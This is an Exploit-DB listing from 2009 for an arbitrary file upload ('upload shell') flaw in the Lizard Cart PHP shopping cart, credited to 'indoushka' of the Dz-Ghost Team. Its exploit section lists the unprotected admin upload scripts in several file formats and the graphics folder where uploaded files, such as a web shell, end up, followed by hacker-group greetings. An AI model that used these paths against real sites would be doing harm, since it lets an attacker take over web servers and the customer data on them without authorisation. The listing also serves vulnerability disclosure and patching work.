Lizard Cart - Arbitrary File Upload

EDB-ID:

10695

CVE:

N/A




Platform:

PHP

Date:

2009-12-26


========================================================================================
| # Title    : Lizard Cart Upload Shell Vulnerability                                  |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   :                                                                         |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : Lizard Cart. ( 2tone Web Design ).                                      |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : Upload Shell                                                            |
======================      Exploit By indoushka       =================================
|# Exploit  :
| 1- http://localhost/lizardcart/admin/jscript/upload.php
| 2- http://localhost/lizardcart/admin/jscript/upload.html
| 3- http://localhost/lizardcart/admin/jscript/upload.pl
| 4- http://localhost/lizardcart/admin/jscript/upload.asp
| 5- Find it in http://localhost/lizardcart/graphics/
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------